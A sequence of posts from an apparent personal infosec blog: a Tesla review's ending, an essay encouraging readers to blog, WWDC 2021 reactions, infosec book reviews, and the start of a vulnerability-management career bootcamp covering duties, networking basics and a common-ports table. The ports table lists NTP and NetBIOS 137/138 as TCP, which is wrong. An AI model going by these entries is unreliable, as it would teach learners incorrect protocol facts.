Beyond the good and the bad, there are the things that just, are. I list these “neutral” items below.

Warranty : Tesla has what I consider to be a pretty good warranty. The warranty is described as follows… Basic Vehicle - 4 years or 50,000 mi, whichever comes first + Battery & Drive Unit - 8 years or 120,000 mi, whichever comes first.

Wrap Up

It’s amazing to see Elon’s master plan for Tesla come to life, I really do believe what he has created is the most fun you could possibly have in a car.

Alright! That’s the end of the “Revue”. I thank you for reading and I’d love to hear your feedback. Are you planning on ordering a Tesla? If so, please use my referral code! Agree or disagree with any of the points I made? Let me know about it!

Finally, I highly recommend you check out this amazing comic/review by The Oatmeal. It does a better job than I ever could of summing up the real magic of owning a Tesla.

Why I Blog. You Should Too!

Tue, 13 Jul 2021 10:50:00 -0400

You should start a blog. If you disagree, I certainly understand the hesitancy. I was once like you! The thought of building + maintaining a website, or “blogging” might evoke worrisome thoughts. But fear not! I can help allay these fears. Once you overcome that initial anxiety, you can settle in and reap the many benefits of having a website. Trust me, it will be time well spent. Just be careful though! You may find yourself completely obsessed with your site before long!

Historical Context

I started the shellsharks site in mid-2019. At that time, I had but two ideas for topics to write about—a “Getting Into Infosec” guide and the idea to catalog all of the “named” vulnerabilities (e.g. “Heartbleed”). Prior to 2019, I tried at least two other times to blog or otherwise “write”—both of which fizzled out before I even got to a second post. At the time, I blamed this on the usual reasons—not enough time, didn’t know what to write about, couldn’t find my “niche”, etc… What I failed to realize then are a number of things I fully appreciate today, and I’d like to share this understanding with you. Let me start with what not to worry about when starting a blog…

What Not To Worry About

In this section is a list of common concerns & fears people have when faced with the thought of starting a blog. Many of these slowed me down in the beginning but I am here to tell you, don’t worry about it!

I don’t know how to host a blog : This is an easy fix and it is only a quick web search away! You have plenty of options too. There are a lot of fully-managed hosting platforms, some where you have only partial control of the overall stack, and then of course fully self-hosted options. Just pick the one you feel most comfortable with and get started!
I don’t know which blog hosting provider is best : OK, so you’re still stuck on which hosting provider to go with. As long as your selection allows you to BYO domain name and where your data/writing is portable, you should have no problems migrating to a new hosting provider at any time, for any reason. So just pick one that meets those two criteria and get moving! Rather than worrying about your tech stack (all of which is almost always interchangeable), you can focus on what really matters—writing and site design. I argue for site design being important here because afterall, your website is your new digital home.
No one will read my blog : Will you become a well-known blogger? Statistically speaking, probably not. Will someone read what you put on the Internet? Statistically speaking, absolutely! The Internet is vast, and even the most remote corners receive some sort of traffic (not that you should care about pageviews or analytics at all). But you don’t have to write for anyone else y’know. Write for you! Your experiences matter and documenting them for your own historical purposes and reference is more than sufficient reason to have your own site. I had similar concerns when I started my site but I have found, over time, that people are interested. People will inevitably find and read what you have to say! People will even eventually comment or give you feedback. That feedback may also even be positive! Whether people read it or not though is inconsequential. There are plenty of benefits regardless.
I don’t have anything to write about : You write about what you are interested in, working on, or generally doing. Unless you are interested in / working on / doing NOTHING, you will always have material!
What I publish will be bad or uninteresting : This could only possibly be true if you write about something that literally no one else is interested in or that no one else is working on something related to. In a world with close to 5 billion Internet users, I doubt you are writing about anything that is THAT niche. In other words, there are like-minded folks out there. They want to read what you have to say. If you’re worried you aren’t a strong writer, don’t worry, you can get better. Everyone starts somewhere. Say what you want to say in the way you say it.
I have nothing novel to contribute : I write mostly about infosec topics. You know who else does that? Lots of people. Like, so many people. It didn’t deter me, nor did it deter all of those awesome creators. It shouldn’t deter you either. Even if it’s been said before, it hasn’t been said in the way you’re going to say it. People benefit from different perspectives on the same thing. People also benefit from the same perspective on the same thing. Not every creator has the same audience either. You may reach someone that no one else has yet, or offer something a little different, or extra, that helps someone where nothing else had.
I don’t have a niche : You don’t need one! Write about whatever you want, as broadly as you want. Sure, some may say that by writing across a broad range of topics you run the risk of alienating some of your potential readership that would only be interested in your core topics—and this may be true, but the way I consume content from blogs is by scrolling through a feed of blogs I follow, and if the post looks interesting to me, I read it. Otherwise, I scroll past. So don’t box yourself in creatively. Be yourself and write about whatever you like. I’ll add that people in general have broad interests. If you write broadly, you will reach a larger audience. I for example write about infosec, non-infosec-tech stuff, and life in general!
I’m not an expert : You don’t need to be. A lot of people aren’t “experts”. You don’t have to be the foremost expert on a topic for your perspective to be valuable. Sometimes a more relatable approach, and thus more digestible, comes from someone with less experience. Simply explain who you are, what your experience is and then write about your topic from your perspective. You will likely find that people can learn more from someone who is in a similar situation as them then from some expert who might not understand how the layman thinks.
What if I say something incorrect or it isn’t written perfectly? : Perfection is the enemy of productivity. Don’t worry about being flawless, and don’t sweat the times you are incorrect. With any luck, someone will call you out on something you post that’s wrong and you will have a chance to learn from that mistake and you can update the post at that time! No one knows everything, not even the big names in your given industry or field. It’s ok to be wrong, and it’s also OK to change your mind, update/fix your content, etc… Since you own & control your site, and your content, each and every page and post on your site can exist as living documents. You are free to update, edit, modify or even delete things at will. Focus on the quality of your work over time and you will have no problem.
I don’t know if I can post regularly : You don’t have to post every week. You don’t have to post every month. Just post when you have something to write about. It’s also perfectly acceptable to post something that is a work-in-progress, and add to it in increments as you work on finishing the complete piece.

So Why Blog?

OK, so hopefully some of your common fears have been allayed. Now let’s get into the reasons why I, and the reasons why YOU should start a blog. I should accentuate the fact that each of the items listed below I actively benefit from, and you can too!

It gives meaning to the time you spend on things : Have you ever learned something only to forget it later? Or worked hard on something only for it to go seemingly unnoticed or unappreciated? Do you ever just forget what you did last year? Or even last week? Yeah, me too. Instead of losing it to time, why not document what you did, how you did it, what you learned, etc…? In doing so, you can preserve a historical record which can be shared, remembered, or referenced long into the future. Over time, there is a cumulative effect to writing about the things you do, learn and accomplish. You can link to this past work and build an incredibly useful quasi-second-brain along the way.
It can help you remember how you did something : Let your blog be a reference for yourself. In my career, and in my life, I have forgotten a lot of what I have learned. If I had taken the time to document these things, in my own way, with my own context, I’d have the best possible reference to go back and remember it all.
Documenting can help you retain it long-term : Similar to the point above, the simple act of documenting/writing things will help you retain that knowledge long-term. Worst case scenario though, if you do end up forgetting, you have it documented!
It can look good on a resume or as part of a professional portfolio : Having a place where you document your research and other work can impress current or future employers. This will supplement your resume by speaking to the skills and experience you claim to possess.
It can help you network : Ultimately, when people do read your material, they may reach out to you. In those moments, you have an opportunity to make a meaningful connection either personally or professionally.
Your content can help someone : If you’ve learned something, chances are, you aren’t the only person in the world who didn’t know that thing. Which means, someone else out there can benefit from what you learned and how you learned it.
It can trigger other bursts of creativity and productivity : As you write and as you create, you tend to come up with even more ideas. Good begets great, inspire yourself!
You will likely learn more by creating : Some say the best way to learn is to teach. By teaching, or in this case, by documenting what you learn in such a way that it is consumable by others than yourself, you will further cement that material in your own mind. In other words, for you to confidently teach something, you need to know it very well. So learn to create, create to teach and then teach to learn!
It can help create a social/professional identity tied to YOU rather than where you work : What I mean here is, you can market yourself through your site rather than through traditional mediums like Linkedin or (*grumble*) your resume. Linkedin is focused on your professional history alone. This makes it hard to decouple your identity, who you really are, from where you’ve worked and what titles you held. Your resume is even worse! It boxes you in to just 1-2 pages where you hope to fully explain your professional worth. A website you own and control allows you to fully document and share your authentic self, what you can do, what you have done, what matters to you, etc…
It’s fun! : I’m not saying having a blog isn’t work, it is. But work can be fun. Especially when it’s done at your own pace and leisure. I personally get a lot of enjoyment out of maintaining my site.
It can turn into something more : Who knows, your innocent, low-volume, professional-ish blog could turn into something more. Maybe it becomes popular, maybe you can monetize it, maybe it will yield business opportunities, there is a lot of potential. This potential remains untapped unless you try.
Secure your identity on the web : Don’t rely on traditional social media to be your identity on the web. Tie your identity to your domain. Read more about why this is important here.
For humanity: Don’t let the web become exclusively the soulless blended slop of humanities exploits pre-2020’s. You can continue to inject your real, messy, human voice into an increasingly inhuman web.

With All That Said

Great! Your fears are quelled and you are now excited to reap the rewards of starting a blog. But not so fast! Let me share just a few teeny-tiny “gotchas”.

It does take time : No surprise here, but yes, writing takes time. I personally feel the time it takes to document something is worth it though, given all the benefits.
You may get wrapped up in it : What I mean is, you may end up spending more time than you had originally thought you would. This is both good and bad! I think it is a really productive and healthy outlet, but you need to be conscious of your other time commitments.
You should put care and diligence into what you post : Though I have said that your material doesn’t need to be perfect, you should still take care to post accurate and quality material.

Finally, here are a few other things to consider before starting on your site-having journey.

Wrap-Up

So that’s my pitch. Tons of people do it. You can do it. Your perspective is valuable. The benefits are immense. You should start a blog.

So are you convinced? I’d love to hear about it! Let me know your blog idea or share your URL with me. If its an infosec-related blog, I’ll even add it to my collection! Still not convinced? I’d like to hear about that too. Thanks for reading!

Resources

SANS SEC537: Practical OSINT Review

Sun, 11 Jul 2021 06:00:00 -0400

Thoughts on WWDC 2021

Wed, 09 Jun 2021 09:35:00 -0400

Another year, another WWDC. At first viewing, I felt this event was pretty lackluster. However, once I had the chance to mentally digest and dig more into some of the announced features, I decided there is a lot to be excited about! Some of my takeaways and opinions on the various additions across Apple’s OS lineup are listed below.

* Many, if not most of the features listed in this section are not only coming to iPhone but also coming to iPad in the new version of iPadOS as well as to the Mac in macOS Monterey.

The first thing I thought of when SharePlay (specifically the screen sharing feature) was announced was, “Apple just reinvented remote tech support for the in-laws…” - also this.
Now that I can invite anyone to FaceTime, I can finally include my poor green bubble friends/family in the video chat fun. This will help me cut down on the insane number of video-chatting apps I have on my devices (e.g. Slack, Messenger, Discord, Duo, Meet, Chat, Zoom, etc…) which have been necessary to accommodate the non-iPhone-wielders.
The Shared with You feature for Photos which aggregates the pictures sent to you via iMessage, I can see being very useful depending on where they draw the line. I’m sure plenty of people get a lot of pictures (*cough* GIFs) that they don’t necessarily want junking up their Photos app. I personally share and receive a lot of articles and it would be pretty nice to have those aggregated for me in News / Safari.
New Memoji - Do people use Memoji?
The new Notification summary claims to leverage “on-device intelligence” to order and prioritize your notifications. No chance (in my mind) that this can accurately order my notifications. I wonder if they’ll allow me to manually order my notifications based on app? In any case, I am pretty conservative with what apps I allow to send me notifications in the first place so I don’t really need this support.
The new Maps redesign looks really cool, I especially like the elevation visualization. I want to use Apple Maps, I really do. It’s just, I still don’t really have confidence in it.
The new immersive walking instructions seems very useful as I NEVER know how to orient myself in situations like getting off at a metro stop.
They’ve redesigned the aesthetic of the Safari tab bar. I think the new design is fine, but I don’t really get why they feel the need to redesign this every year. Just leave tabs alone!
Safari extensions are no longer just for Mac! This didn’t get a lot of air-time but I think this is one of the really awesome features from the event. Just take a look at the new 1Password extension interface!
ID cards (i.e. Driver’s License) in the Apple Wallet app?! This is one step closer to getting rid of the wallet all together. I’m very much looking forward to this. This will require state-by-state buy-in though before it becomes practical.
The new Key feature is interesting. I’m wondering if my existing August Smart Lock (from 2018) will support this. Similarly, I wonder if Tesla would ever add support for the Car keys feature.
Live Text is a cool feature and one that I can see myself actually using. From pictures of recipes to whiteboards - there’s certainly practical use cases.
Visual Look Up will be an awesome feature if it works well. I’d love to ID a plant or animal just with a picture.
Not sure why they needed to rebrand iCloud as “iCloud+”. Why not just add features to iCloud and leave it with the same name?
iCloud Private Relay is just Apple Tor yeah? Well since Tor is so secure this should be too right? =P. I’m curious who runs the relay nodes.
Not explicitly announced, but I did see some new iOS widgets that I am interested in putting on my home screen.
With new features added to Notes, it’s getting dangerously close to something I would switch to as my main note-taking app. I do love Simplenote but it’s getting harder to deny the advantages the native integration of the Notes app has.
I like the idea of the new Focus feature but feel it’s so customizable that I think you’ll actually just be more productive if you simply put your phone away when trying to focus on something rather than obsessing over different focus profiles for hours like I know I would.
Siri now has on-device speech processing and offline support. This should hopefully alleviate some pain points with using the voice assistant.

All together, I do think the iPad is getting a pretty decent productivity boost.
The new Multitasking suite seems better. But… the demo left me feeling a bit lost. It will definitely take some hands-on time to really get the hang of it.
The biggest thing I wanted from iPadOS was widgets on the home screen. This was such an obvious thing and one that I really can’t believe didn’t ship when widgets first debuted. With the insane processing power of the latest gen, M1-enabled iPads, there really was no reason to not add it.
App Library is dumb. It’s on iPad now. Meh.
I think Quick Note is awesome! One other reason why I am thinking of moving to Notes as my primary notes app. I wish this feature was on iPhone as well.
It would be cool if the screen sharing feature of FaceTime could be limited to a specific split-screened app on iPad.
So we didn’t get Xcode for iPad. But we did get a souped up version of Swift Playgrounds. I think in time a more feature-filled, Xcode-like app will make its way to iPad, but for now, it’s Swift Playgrounds.
Universal Control is a feature I will definitely use. I typically have two separate Mac devices and an iPad open on my desk and being able to control all from a single set of peripherals is a great idea…

The new macOS is bringing the ability to AirPlay to a Mac. What I really want is to AirPlay the screen of a MacBook Pro to a set of connected displays attached to a different Mac. Here’s my scenario - I have three displays connected to a desktop Mac Pro which is used as a “personal” device. I also have a MacBook Pro that is a work machine. I would love to be able to leverage the screen real estate of the displays connected to my Mac Pro on my laptop without having to disconnect the displays and connect them to the MacBook Pro. Imagine if I could simply AirPlay three “spaces” to the three remote displays? That would be amazing.
Shortcuts on Mac has the potential to be really powerful. I wonder what support it will receive with respect to third-party developers making actions available to the app.

The keynote had a video where a smart doorbell was rang and an Apple Watch immediately brought up a video view from the doorbell’s camera. I have an Apple Watch 4 so maybe I don’t realize how fast the recent gen Watches are, but the smoothness of bringing this live video feed up seems too good to be true in real-world use.
Home key on the watch will be my favorite new Watch feature. Just *tap* and I’m into my house.
Still don’t care about the Breathe app.
There are new Sleep tracking features but I still don’t know when I would charge my Watch if I was using this.
Next-hour precipitation alerts are nice.
Walking Steadiness is completely ridiculous. I can’t wait for it to go off constantly when I am playing basketball.

There are also some new features coming to tvOS this Fall. The most interesting of which is the ability to use HomePod Mini’s as speakers for your Apple TV.

Cybersecurity Library

Thu, 03 Jun 2021 13:52:00 -0400

Though there is a real wealth of infosec learning resources out there including an immense collection of online training to a dizzying array of unique blogs from security professionals and enthusiasts, having a solid, old-fashioned book as a reference or instructional tool is always good to have!

With this in mind, I’ve created an Amazon list with all the Infosec books I own. Though I certainly haven’t read each of these cover-to-cover, I purchased each based on the good reviews they received and the value of their content relevant to my interests in information security.

I’m always looking to learn and as such am continuously evaluating new books to add to my library. In this vein, I also maintain an Amazon list of books I am looking to potentially purchase.

Book Library:

Shopping List:

Book Reviews

Below I share my thoughts on the books that I do use regularly or have read most of.

The Web Application Hackers Handbook (2nd Edition)

This book is truly the bible of web application hacking and though it has been superseded by PortSwigger’s Web Security Academy it’s content is still extremely relevant and a great resource for any appsec professional. With inline exercises and questions, it can be used not only as a spot reference but also as a textbook of sorts which could be read cover-to-cover (give yourself some time as it’s certainly a tome at 800+ pages). Can’t recommend this book enough!

Bulletproof TLS and PKI, Second Edition

Currently working my way through the entirety of this book. I’ve found it to be a pretty definitive guide on the inner-workings of TLS. The 2nd edition (I made the mistake of getting the first edition originally) has an extra section on TLS 1.3 (at least) which is great. If you’re looking for a deep dive on underlying crypto mechanisms that TLS relies on you may need to find some additional references.

Vulnerability Management Bootcamp

Fri, 23 Apr 2021 00:42:00 -0400

Vulnerability Management is an excellent way to kick-start a career in cybersecurity. This guide will help show you the way.

Jump to Section

Why Vulnerability Management?
What Do VM Professionals Actually Do?
Bootcamp Intro
VM Knowledge Pre-Requisites
Bootcamp Lab
Bootcamp Lab Exercise Answers
Scenario-Based Exercises
How to Find a VM Job
Tackling the Interview
Help & Outro

Why Vulnerability Management?

Vulnerability Management (a.k.a. “VM”) is a less-considered, but in my opinion, ideal entry-level role for aspiring infosec professionals. For many who are looking to get into information security, finding that first job can be very difficult. Typical recommended paths into infosec include roles such as help desk, SIOC/SOC, system administration, network engineering or even software development. Though there is no one path that is universally best, I believe VM can be an optimal choice for a number of different reasons.

Why Start Your Infosec Career with Vulnerability Management

A lot of true infosec positions are not really considered “junior” or “entry-level” (e.g. penetration testing, threat hunting, reverse engineering, application security, etc…) This means it is difficult to jump directly into those roles without some prior experience in infosec. VM however, is considered junior and thus is more readily attainable by those with little-to-no prior infosec experience.
Unlike other recommended “starter” roles (i.e. help desk, system administration, etc…), VM is a true infosec role. What I mean by this is, having the title “Vulnerability Management” (or some derivation of this title) on your resume counts towards years of experience in cybersecurity whereas having help desk (for example) experience on your resume would likely not be considered infosec-relevant experience.
VM (in my opinion), is easier to learn the basics of as compared to other potential starter positions. Don’t get me wrong, you certainly need to have a breadth of knowledge in a number of different areas but you don’t (for example) need to be able to fully administer Linux/Windows, or engineer a network, or perform in-depth packet analysis, or be an expert coder to work in VM (though it wouldn’t hurt!). You need only have (at least starting out) a relatively foundational grasp of a handful of knowledge areas.
Those in VM roles are exposed to a wide variety of other infosec domains. For example, in performing the week-to-week responsibilities of a VM analyst/engineer, you will encounter vulnerabilities that a penetration tester would also encounter, you may be asked to assess the risk of scan findings similar to what a GRC analyst would be asked to do, you could also be asked how to patch or mitigate issues like a system administrator would need to do, etc… Collectively, these experiences are great for building a solid generalist base of knowledge and could also help you pivot into other areas of infosec if/when you are ready to do so.
Penetration testing is a very sought-after infosec position but can be out-of-reach for many entry-level professionals. This is for good reason as penetration testing requires skills and experience that are a bit more advanced. VM is a great stepping-stone to a career in penetration testing as you get a lot of hands-on experience with the vulnerabilities you will be exploiting as a penetration tester. (NOTE: This statement is not meant to discourage those looking to get into penetration testing early in their careers. It certainly can be done!)
VM analysts typically get a good bit of face-time across IT organizations. What I mean by this is that you will likely be asked to interface with a wide variety of groups within IT - server teams, desktop teams, development teams, IT leadership, etc… This exposure helps network you around the organization and also gives you the opportunity to learn from a diverse set of personalities and professionals.
VM is (or really should be) ubiquitous. Since VM is fundamental to all organizations, the need for qualified and/or knowledgeable VM professionals is abundant. In other words, there is a lot of opportunity in learning this particular craft. With that said, there is an increasing prevalence of out-sourced, managed VM which means this function may become more and more commoditized.

VM Compared to Other Infosec Starter-Roles

There are a number of different “starter” roles one could consider as they begin their journey into infosec. I personally believe VM is one of the better options as compared to these other roles. Some of the cons of these other roles are detailed below.

In help desk roles, learning (specifically infosec-related learning) tends to stagnate, your ability to perform actual “security” work is limited, pay tends to be lower and opportunities to pivot into more security-specific roles are often non-existent or overly hard-fought. There also tends to be a stigma attached to “help desk” which if you’re not careful, could hinder your ability to break out of that role and onto something more “advanced”.
In SIOC/SOC or other blue-team-analyst-type roles, you get great exposure to “real” security work, but this often comes at the expense of jobs that are high stress, have weird/long hours and/or are very scripted in nature with respect to operational responsibilities, limiting the ability to learn and grow. A lot of individuals in these positions suffer from burn-out or other stress-related issues.
In system administration roles, you learn a great deal about the OS (i.e. Windows, Linux, Mac) you are administering but do not necessarily get to perform any security-specific work. This experience certainly comes in handy later in an infosec career but might not help too much for breaking into the field initially.
In network engineering roles, you can easily find yourself siloed into only performing network engineering and never getting to break out and do any actual security work. I’ll add that this path requires quite a bit of technical depth on the networking side which makes this path particularly difficult for an entry-level individual. With that said, that knowledge could be of great use if/when you do ultimately move into a more security-specific position.
Software development is a common first step for those who ultimately would like to end up in an “Application Security” role. This makes sense considering knowing how to properly assess and secure applications likely means first having some understanding or experience writing/developing applications. With this said, it is a relatively serious commitment that must be made to become a software developer and is probably a bit over-kill if your goal is to quickly get into infosec-proper.

Vulnerability Management Day-to-Day

If you’re with me thus far, you’re likely somewhat interested in a getting a job in Vulnerability Management. You may however be wondering, “what exactly does someone in Vulnerability Management actually do?” This is of course a very relevant question for someone thinking of going down this path so I’d like to try and cover it here. Though it can certainly vary from place to place, VM professionals typically have responsibilities in three functional areas - operations, analysis and engineering. I’ll briefly explain VM responsibilities across each of these domains below…

VM Operations

Though there are elements of VM analysis or engineering that could be considered operational, what I really mean by “operations” is, the every day break-fix, tuning and troubleshooting that a VM professional needs to do to keep scans running on-time and without failure as well as ensuring reports/alerts are being generated and delivered as required. Consider the list of potential operational tasks below…

Scan failures: If a scan fails to kick-off, finish or otherwise does not complete, the VM team will need to troubleshoot what happened. A scan may fail for a number of different reasons: the scanner itself may be malfunctioning, a firewall or IPS may be blocking scan traffic or the target endpoint could have shut off. These are just a few examples.
False positives: Often, a system owner may contact the VM team because they believe a finding on a scan report is a false positive. It is then the VM team’s job to investigate this claim and determine whether it is indeed a false-positive or not. In my experience, especially when it comes to credentialed scans, it is very rarely a real false-positive. In any case, you will need to understand and be able to explain the scan plugin logic to the system owner that way there is a mutual understanding of why that plugin fired.
Scan causes system degradation: Network scans can be somewhat invasive - both on the network as well as against a target host. Though modern operating systems and enterprise networks are fairly robust and thus less likely to have a negative reaction as a result of a common vulnerability scan, it is certainly still possible that a scan could cause network/system degradation. When this happens, the VM team may be contacted to disable the scan.
Creating/maintaining scan jobs: One of the core tenets of VM is that of visibility. What this means is that to the best of our ability, we as the VM team would like to be scanning everything with the highest-fidelity (credentialed) scan type as possible. To achieve this, the VM team will often need to create additional scan jobs or modify existing ones as needed to further increase visibility.
Credential failure: The highest-fidelity scan type is an authenticated scan. To achieve an authenticated scan you need proper credentials which have sufficient privileges on the target host. The scan job must then be populated with these credentials. For any number of reasons, scans may fail to actually login to the host. When this occurs, the VM team will need to diagnose what has happened and fix the scan.
Report/alert tweaking: A key facet of VM is ensuring that appropriate stakeholders receive reports which detail the information and specific findings relevant to them. The VM team is therefore responsible for building and maintaining these reports, regularly auditing whether they are being sent and received properly and that they have the correct and comprehensive data contained within them.

VM Analysis

Much of the “analyst” work a VM professional does could be considered operational as it is something that might be performed on a day-to-day basis. However, I delineate between analysis work and operations based on the skillset needed to perform each. VM analysis is the process of reviewing scan results (and vulnerabilities in general) and performing analysis on these findings which leads to a better understanding of risk. This work stands in stark contrast to operations, which does not require having a deep understanding of threats, vulnerabilities and risk. Below are some examples of VM analysis work…

Creating dashboards/content: Enterprise scan tools have advanced dashboarding and other content-creation capabilities which allow VM analysts to quickly consume VM metrics, trends and other interesting data points related to organization-wide scan results. For example, the VM team may maintain a trend graph which shows the total high-risk vulnerabilities that have been present in the environment over the course of the year. Or, there may be a dashboard component which shows the number of outstanding vulnerabilities across each department within IT.
Risk assessments: A common ask for the VM team is to produce a “risk assessment” related to a certain vulnerability against a specific system or as it applies to the organization as a whole. These risk assessments help IT leadership determine how to prioritize work. If the risk is high, business leaders and IT leadership must make decisions on risk mitigation.
Triaging recently disclosed vulnerabilities: Often new vulnerabilities are disclosed and require speedy analysis from the VM team. In these cases network scan vendors will not have had time to write and publish detection plugins for their respective scanners. When this happens, the VM team will be asked to triage these new vulnerabilities to determine their applicability to the organization’s environment, calculate potential risk and even research/produce possible risk treatments related to that vulnerability.
Vulnerability validation: Network scanners are great at identifying vulnerabilities. What they can’t always do however is determine the “true risk” of a vulnerability based on the relevant network/host-based controls which may mitigate certain aspects of the respective issue. The VM team may be asked to analyze a vulnerability in the context of whether it is truly a risk to the system. In some cases this may mean trying to actively exploit that particular vulnerability to determine if the expected controls which may mitigate said issue actually do so. Though I wouldn’t call this “penetration testing”, it is similar in some ways.
Reviewing scan results: VM analysts may spend a good bit of time simply reviewing the results of scans and evaluating whether any vulnerabilities require special or immediate attention. For example, if a new class of high-risk vulnerability appears in a scan result which does not have automated alerting or reporting content, a VM analyst may want to quickly catch it so it can be triaged accordingly.

VM Engineering

Last but certainly not least, we have VM engineering. Engineering in this context is the design, build and maintenance of the architecture and infrastructure which support VM operations and analysis. Some examples of VM engineering tasks are detailed below…

Patching: VM is supported by scanners, databases, central-consoles and a lot of other infrastructure. This infrastructure must be kept up-to-date with the latest functional/security patches from their respective vendors. The VM team may be responsible for maintaining their own tools in this way. In many cases however, the responsibility of patching, even for VM infrastructure, is placed on an organization-wide patching team rather than resting on the system-owners themselves.
Archictecture: As advancements are made, or perhaps as the VM program is first being built, there is a need to design an architecture for the VM program itself - especially as it relates to scanning operations. The VM team is responsible for designing and deploying VM-related hardware, determining where scanners are placed on the network and much more.
Scan routing: In order to scan all corners of an enterprise network, the VM team must work with the network team to ensure proper rules are in place on the firewalls such that the scanners can traverse the network.
New tooling: As modern enterprises continue to make strides into new computing frontiers (e.g. cloud, microservices, serverless, etc..), the VM team must keep up with respect to maintaining scan comprehension and visibility. To do so, new tools will likely need to be evaluated. Typically, this is done through trial-based, proof-of-concept engagements. The VM team will acquire the tool(s) and a trial license and have a limited amount of time to evaluate a new product to determine if it meets the VM-needs of the organization.
*Scripting & Automation: This final task is something that I believe spans all three VM functional areas. In order to get the most out of the tools you have in your VM tool-kit and to best solve the “scaling” issue within infosec, VM professionals must be able to write scripts and automate against RESTful APIs. These scripts will likely perform operational tasks and therefore the maintenance and creation of these scripts could be considered operational. Similarly, these scripts may perform automated analysis and triage of VM findings. In this way, these scripts can also be considered “analyst” work. Collectively, I think they are also engineering in that they are somewhat one-time efforts (not counting maintenance and upgrades) which help add new functionality to the VM program.

As you can see! There is a lot of interesting work to be done in VM. Due to the breadth of responsibilties and the very nature of the work, I truly believe it is one of the best starter infosec roles out there. Now, let’s get into the bootcamp!

Bootcamp Intro

OK! So you’re excited to learn more about VM and are ready to dive in. This is great! I’d like to officially welcome you to the Shellsharks Vulnerability Management Bootcamp, I am happy to have you here. The primary goal of this bootcamp is to fully prepare someone to not only ace an entry-level Vulnerability Management interview and get offered the job, but to also prepare you to step in day 1 after being hired and immediately hit the ground running with respect to performing the responsibilities of a VM analyst. As such, the specific objectives for this bootcamp as well as what this bootcamp explicitly doesn’t cover are provided in the two separate lists below.

Bootcamp Objectives

Prepare you to ace an entry-level/junior VM interview, the outcome of which is (hopefully) a job offer.
Provide real-world, hands-on, practical, lab-based VM experience which will equip you with the confidence and skills needed to perform VM analyst responsibilities immediately after starting your new job.

What the Bootcamp Doesn’t Cover

There are purposefully-open-ended, scenario-based questions at the end of the bootcamp lab. “Answers” for these questions are not explicitly provided. In fact, these questions do not have one correct answer, rather they are designed to be more of an exploratory thought-exercise based on real-world challenges a VM analyst might be expected to solve. For more information on how best to approach solving these prompts, you are encouraged to contact me or start a discussion in the Shellsharks Discord.
Here lies the necessary disclaimer that this “bootcamp” does not guarantee that you will be given interview opportunities nor that by completing the bootcamp you will be 100% prepared for any and all questions/prompts you may encounter in a VM interview. I have, to the best of my ability, attempted to provide as much information, both purely academic as well as practical which aims to achieve the objectives set forth in the previous section.
The goal of this bootcamp is not to make one an expert in all things VM. As such, there are many facets of VM that are only superficially covered or not mentioned at all. Expertise is developed over time and through years of experience and personal research. Though the goal of this piece is merely to introduce VM and give someone enough understanding to ace an interview, I am working on a more comprehensive compendium of VM knowledge - so stay tuned for that!

Bootcamp Sections

The bootcamp is comprised of the following five sections…

Part 1: VM Knowledge Pre-Requisites

Vulnerability Management, though “entry-level” in many respects, still requires a level of foundational infosec knowledge. This section provides an accelerated course of study through these knowledge areas. This is delivered though both statically-defined tips as well as externally-sourced references. The expectation is to have a fundamental grasp of these concepts and be able to speak reasonably well about them in an interview.

Part 2: VM Bootcamp Lab

This is the main portion of the bootcamp which walks you through how to set up the lab environment and how to perform a variety of different processes and actions related to VM. In this section there are also provided exercises designed to test your knowledge and understanding along the way. These questions have answers provided. Ultimately, this section will help you demonstrate in an interview, your hands-on understanding of the tools and techniques of the VM trade.

Part 3: Scenario-Based Exercises

As described previously, the scenario-based questions are open-ended and designed to be exploratory topics rooted in real-world situations I have encountered in my years in the VM arena. I encourage those who have produced solutions to these questions to contact me or start a discussion in the Shellsharks Discord. By solving these challenges, you best prepare yourself for solving similar problems once “on-the-job”.

Part 4: Finding a Job in VM

After you learn the basics but before you actually get an interview, you must first find actual VM jobs to apply to. This isn’t always straight-forward. This section will share some tips on how to best pinpoint VM-related jobs to apply to.

Part 5: The Interview

Finally, I provide a list (that I will continue to contribute to) of likely interview questions you may encounter during an entry-level VM job interview. Accompanying each of these questions is one possible answer (or a reference which can help you understand the answer). These questions will cover a variety of topics but will mostly be sourced from the VM knowledge pre-reqs and the lab exercises.

VM Knowledge Pre-Requisites

To get started in VM, there are a handful of knowledge areas that are in my opinion critical to have a basis in. As it pertains to the objective of this bootcamp, understanding these fundamental areas will best equip you to succeed in a VM interview and execute from day one once accepting a VM job offer. This pre-requisite material is succinctly listed below, either as informational snippets or externally-linked references. Where possible, I summarize why or what specifically may be required for you to understand about a specific topic. The goal of which is to reduce the total amount of prep that is needed to simply ace an interview.

Networking

TCP “Three-Way Handshake”” - Understand SYN –> SYN/ACK –> ACK.
OSI model - Know the layers in order and generally what they are responsible for.
NMAP - Know what Nmap is and what some of the basic flags do.
Port Scan Techniques (e.g. SYN, connect, UDP, NULL, FIN, Xmas, ACK, Zombie, etc…) - Best to at least understand the SYN, connect and UDP scan types.
TCP Flags (i.e. SYN, ACK, FIN, RST, PSH, URG) - Know what each is used for.
Network Devices - Understand what the basic networking devices are and what they do.
TCP vs UDP - Understand the basic differences between TCP and UDP.

Ports & Protocols

ICMP - Understand how it’s used for the ping and Microsoft tracert utilities.
Ephemeral Ports - What are “ephemeral” ports and why are they different than system / “well-known” ports.
*For each of the protocols specified below, simply understand what they are and remember the associated port number. Other ports and protocols may be asked about during an interview but the ones below makeup a majority of the popular ports/protocols.

Protocol	TCP/UDP	Port #
FTP	TCP	20/21
SSH	TCP	22
Telnet	TCP	23
SMTP	TCP	25
DNS	TCP & UDP	53
DHCP	UDP	67/68
HTTP	TCP	80
POP3	TCP	110
NTP	TCP	123
NetBIOS	TCP	137/138/139
SNMP	UDP	161
LDAP	TCP	389
HTTPS	TCP	443
SMB	TCP	445
MySQL	TCP	3306
RDP	TCP	3389

Operating Systems

Basic Windows CLI - Learn basic Windows CLI commands (e.g. ipconfig, netstat, ping, tracert, systeminfo, net use, regedit, net user, etc…) You may be asked about specific commands but more likely an interviewer will just ask you qualitatively, how “familiar” you are with Windows.
Basic Linux CLI - Learn basic Linux CLI commands (e.g. curl, ls, tail, cat, grep, ps, top, netstat, ifconfig, ip, df, du, id, chmod, nslookup, ping, etc…) You may be asked about specific commands but more likely an interviewer will just ask you qualitatively, how “familiar” you are with Linux.
Linux file directory structure (e.g. root, bin, cdrom, dev, etc, home, lib, media, mnt, opt, proc, run, sbin, tmp, etc…) - Understand what is typically found in each of these directories.
SSH - What is SSH used for? I also recommend having SSH’ed into something as practice.
Windows Firewall - Just be mildly familiar.
Linux Firewall / iptables - Just understand the basics.
